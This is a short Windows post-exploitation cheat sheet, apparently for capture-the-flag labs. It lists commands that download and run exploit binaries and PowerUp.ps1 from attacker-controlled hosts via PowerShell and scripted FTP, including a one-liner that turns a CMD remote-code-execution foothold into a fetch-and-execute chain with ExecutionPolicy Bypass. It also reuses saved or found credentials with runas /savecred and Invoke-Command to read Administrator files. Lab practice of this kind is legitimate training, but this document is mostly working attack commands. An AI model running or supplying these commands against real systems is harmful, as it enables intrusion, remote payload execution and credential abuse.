Download a file using CMD using Powershell
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.14.10/chimichurri.exe" >>wget.ps1
echo $file = "exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
echo open 10.10.14.8 >> $FILE_NAME & echo asdf >> $FILE_NAME & echo USER anonymous >> $FILE_NAME & echo PASS password >> $FILE_NAME & echo get exploit.exe >> $FILE_NAME & echo bye >> $FILE_NAME
ftp -ns:$FILE_NAME
If you get a CMD RCE use this to make a PS1 file that can download other files.
cmd.exe /c "@echo open 10.10.14.8>script.txt&@echo anonymous>>script.txt&@echo password>>script.txt&@echo get script.ps1>>script.txt&@echo bye>>script.txt&@ftp -ns:script.txt&@powershell.exe -File script.ps1"
attrib -s -h -r /s /d *.*
Show files from alternate data sources
View files from the alternate source
runas /savecred /user:$MACHINE_NAME\$USER_NAME "cmd /c COMMAND GOES HERE"
Use found credentials to run commands as user
$Username = 'USER_NAME'
$Password = 'PASSWORD'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass
Invoke-Command -ComputerName $MACHINE_NAME -Credential $Cred -ScriptBlock { type C:\Users\Administrator\Desktop\root.txt }
Download a file using PowerShell
powershell -command "& { iwr http://10.10.14.13/PowerUp.ps1 -OutFile PowerUp.ps1 }"
Import a module from a different location
Import-Module -Name C:\Users\mssql-svc\modules\PowerUp.ps1 -Verbose
